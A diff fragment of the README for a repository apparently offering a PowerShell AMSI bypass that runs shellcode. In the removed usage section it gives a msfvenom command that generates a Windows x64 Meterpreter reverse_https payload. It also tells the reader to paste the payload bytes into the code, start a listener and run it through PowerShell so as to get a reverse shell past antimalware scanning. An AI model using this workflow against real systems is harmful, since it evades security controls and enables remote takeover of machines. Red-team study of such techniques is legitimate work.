Haru1O1/AMSI_Powershell_Bypass/README.md

     - After the shell code finishes, it should cause the thread to terminate
         - Ex.
 Reverse Shell -> after the attacker terminates the session, the thread should also be terminated, and with it, PowerShell as well

-## Usage(Msfvenom)
-First, generate a payload, let's say a msfvenom x64 reverse https using this command
-*msfvenom -p windows/x64/meterpreter/reverse_https LHOST=ip LPORT=443 -f csharp*
-Take the output starting at the bytes and copy it into the code.
-Run a listener with the *ip* and run the code using PowerShell.

 ## Explanation
 # 1.
 ```powershell